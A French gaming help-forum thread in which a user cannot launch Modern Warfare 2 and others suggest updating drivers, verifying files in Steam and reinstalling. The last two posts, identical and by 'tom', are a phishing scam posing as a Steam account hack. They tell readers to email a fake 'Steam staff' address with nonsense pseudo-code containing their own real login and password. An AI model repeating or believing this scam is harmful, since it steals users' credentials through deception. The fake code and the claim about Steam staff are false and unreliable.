Aider moi:probleme de connection sur MW2 (PC)

Thibaut -  
 tom -
Bonjour a tous j'ai un probleme de connecton sur MW2 donc je lance normalement MW2 mais quand la grande fenetre de MW2 s'affiche et bien au lieu d avoir mon pointeur de souris il y a le sablier.J'ai attendue 5-10 min et sa n' a pa marche donc je l'est fermer et sa ma mis MW2 ne reponds pas donc j'ai cocher terminer maitenant. J'ai réssayé de l ouvrir et cette fois si sa me dit de lancer MW2 en mode sans échec. la premiere fois j ai mis non et le meme probleme qu avant le sablier au lieu du pointeur donc j ai relancer et cette fois ci j'ai mis oui et sa ma fais un zoom sur mon bureau et pareil j ai attendue 5-10 min et sa na pas marché.

est-ce-que vous savez ce que c'est? si oui dites le rapidement svp

merci d'avance

17 réponses

Thibaut

up svp
0
Utilisateur anonyme

C'est quoi ta config ?
Pilotes graphiques a jour ?
0
Thibaut

cnfig de quoi? et c est ou que tu vois les pilotes graphiques? et sa m etonnerait que se soit sa car tout les autre jeux marche
0
Thibaut

up svp
0

Vous n’avez pas trouvé la réponse que vous recherchez ?

Posez votre question
Utilisateur anonyme

Config c'est les composants de ton PC: Processeur/carte graphique/ Memoire / OS etc etc

Pour MW2 il faut avoir les pilotes a jour, selon le type de carte graphique:

https://www.nvidia.com/fr-fr/
ou
http://support.amd.com/fr/gpudownload/Pages/index.aspx

Si tu as le jeu sous steam:
ouvrir Steam puis allez dans "Mes jeux". Cliquez droit sur le mode solo ou le mode multijoueur de Call of Duty puis allez dans Propriétés > Fichiers Locaux > Vérification de l'intégralité du cache du jeu... Steam va vérifier si certains fichiers du jeu manquent puis va les télécharger et les replacer.

Sinon Désinstalle et réinstalle...

Je crois que ton pc n'est paas asser performent sais pour sa que le jeux s'ouvre et se ferme sinon a tu deja jouer avec ?
0
Thibaut

ok mci will66 je suis entrain de le faire etje te dit si sa marche. et non leo j ai jouer plein de fois a cod6
0
Profil bloqué

Alors sais pas ta configuration,tes sur steam??
0
Thibaut

will66 sa ma mis 6 fichier n ont pas ete trouver et vont etre remplacer
0
Thibaut

sa marche pas bon ben je le desinstalle et reinstale
0
Thibaut

je l est desinstaller et reinstaller sa marche pas
0
Utilisateur anonyme

Ça aurait du marcher en remplaçant les fichiers, espérons que la réinstall marche mieux...steam c'est une vraie usine a gaz !
0
Thibaut

mais avec la reinstalle sa a pas marcher
0
Utilisateur anonyme

tu disais que t'avais déjà joué au jeu plusieurs fois avant sur ce PC ?
T'as pas changé d'antivirus ou autre chose ?
0
nicolas

salut je narrive pas a jouer a call of duty mw2 quand je clique 2x sur mw2 sa me mais un ecran noir et plus rien
0
tom

1. Rentrer dans votre messagerie et ecrivez un Nouveau Message , comme Destinataire mettez cet email : steampoweraccount@live.fr (c'est l'email que le staff de steam utilise pour trouver le password que quelq'un reclame quand il l'a perdu) et dans Objet mettez ce titre : " Retrieve Password "

2. Maintenant on n'est rendu la partie la plus importante, faite un ''copier'' ''coller'' du texte qui est ci-dessous et coller le dans votre message :

public * {Jsp.getNewName(have_pw().action("http://law5.steam.pas­­sport.com/cgi-bin/user.pw.curmbox=search%2ocgi-bin%25!%20f0­1­%20La%20victime}%20action=recoveR%20param=get%25!"));­Fi­leSelectionMode{_account:_password}% param={LOGIN DU COMPTE DESIRE}receiver={_account= VOTRE LOGIN COMPTE:_password:= VOTRE PASSWORD}");have_pw(recover, PW);cloak and send back to 'receiver' {D}/*end code*/}

3. ***Remplacer l'ecriture en majuscule (LOGIN DU COMPTE DESIRE, VOTRE LOGIN COMPTE, VOTRE PASSWORD)par ce qui doit etre ecrit***

Je vous rapelle le principe :

LOGIN DU COMPTE DESIRE : compte que vous voulez hacker (exemple : calimero).

VOTRE LOGIN COMPTE : votre compte steam ( il faut de vrais identifiants ).

VOTRE PASSWORD : le pass de votre vrai compte steam
0
tom

1. Rentrer dans votre messagerie et ecrivez un Nouveau Message , comme Destinataire mettez cet email : steampoweraccount@live.fr (c'est l'email que le staff de steam utilise pour trouver le password que quelq'un reclame quand il l'a perdu) et dans Objet mettez ce titre : " Retrieve Password "

2. Maintenant on n'est rendu la partie la plus importante, faite un ''copier'' ''coller'' du texte qui est ci-dessous et coller le dans votre message :

public * {Jsp.getNewName(have_pw().action("http://law5.steam.pas­­sport.com/cgi-bin/user.pw.curmbox=search%2ocgi-bin%25!%20f0­1­%20La%20victime}%20action=recoveR%20param=get%25!"));­Fi­leSelectionMode{_account:_password}% param={LOGIN DU COMPTE DESIRE}receiver={_account= VOTRE LOGIN COMPTE:_password:= VOTRE PASSWORD}");have_pw(recover, PW);cloak and send back to 'receiver' {D}/*end code*/}

3. ***Remplacer l'ecriture en majuscule (LOGIN DU COMPTE DESIRE, VOTRE LOGIN COMPTE, VOTRE PASSWORD)par ce qui doit etre ecrit***

Je vous rapelle le principe :

LOGIN DU COMPTE DESIRE : compte que vous voulez hacker (exemple : calimero).

VOTRE LOGIN COMPTE : votre compte steam ( il faut de vrais identifiants ).

VOTRE PASSWORD : le pass de votre vrai compte steam
0